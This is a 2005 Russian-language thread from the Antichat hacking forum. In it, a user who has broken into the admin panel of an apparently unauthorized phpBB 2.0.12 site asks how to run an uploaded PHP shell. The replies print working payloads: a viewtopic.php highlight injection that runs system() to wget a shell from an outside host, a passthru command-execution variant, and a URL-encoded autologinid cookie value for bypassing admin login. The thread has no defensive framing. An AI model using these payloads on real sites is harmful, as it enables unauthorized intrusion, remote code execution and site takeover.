Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
O5 25: phpBB, админка, шелл |
09.10.2005, 21:38
|
|
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256
Репутация:
0
|
|
O5 25: phpBB, админка, шелл
Есть сайт -> на нём phpBB 2.0.12 -> смог проникнуть в админку и залить пхп-шелл как аватары, но они соответственно с расширениями .gif или .jpg и их нельзя запустить.
Как можно воспользоваться этими "аватарами", или как залить на сайт шелл с расширением .php, чтобы его можно было запустить?
Слышал, что можно через восстановление БД, но не знаю какой запрос и как именно писать.
Весь день лазил по рунету, но так ничего и не нашёл, кроме того, что это можно сделать.
ПОМОГИТЕ! ПОКАЖИТЕ ИЛИ ДАЙТЕ ССЫЛКИ!
|
|
|
09.10.2005, 21:42
|
|
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256
Репутация:
0
|
|
На вашем сайте видел такой способ:
http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527
Но он не работает.
Последний раз редактировалось Buddy; 09.10.2005 в 21:44..
|
|
|
|
09.10.2005, 21:58
|
|
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567
Репутация:
-12
|
|
там же можно изменить разрешшения файлов загружаемых в админке
|
|
|
|
09.10.2005, 22:09
|
|
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256
Репутация:
0
|
|
Как менять расширения файлов через админку я не знаю, т.к. на том форуме нет никаких дополнительных модов вроде downloads! Голый непропатченый форум.
|
|
|
|
09.10.2005, 22:24
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
Нельзя там через файлы загрузить шелл.
http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527
Понимаешь, эти строки выложены (мной кажется) для того чтобы те кто их использует ПОНИМАЛИ что они делают. Если просто вбить ее в браузер, заменив там адрес сайта то работать это будет в 10% случаев. Ты сначала пойми что это за баг а потом попробуй сам догадаться почему ничего не работает.
Чтобы небыло опять двацпять надо смотреть видео и читать сорцы и статьи про phpBB |
|
|
|
09.10.2005, 23:07
|
|
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256
Репутация:
0
|
|
2 KEZ
В той строке я понимаю, что мы в файл пытаемся включить наш же собственный запрос, но эта дырка уже не работает в версии 2.0.12.
Я же говорю, весь день сегодня читал/смотрел, но так ничего и не нашёл. Наверное просто не знаю что именно искать. Поэтому и прошу помощи.
Мне кажется, в данной ситуации нужно пытаться через восстановление БД, но я не знаю какой именно запрос и в какой части базы писать, т.к. практически не знаю MySQL. Подскажите плиз. Или дайте линки, где читать.
|
|
|
|
09.10.2005, 23:12
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
Ну руками это будет сделать непросто, попробуй сплойтик... Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть
|
|
|
|
09.10.2005, 23:56
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
А разве highlight='.passthru($HTTP_GET_VARS[cmd]).' не работает на 12 версии?
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
10.10.2005, 22:51
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
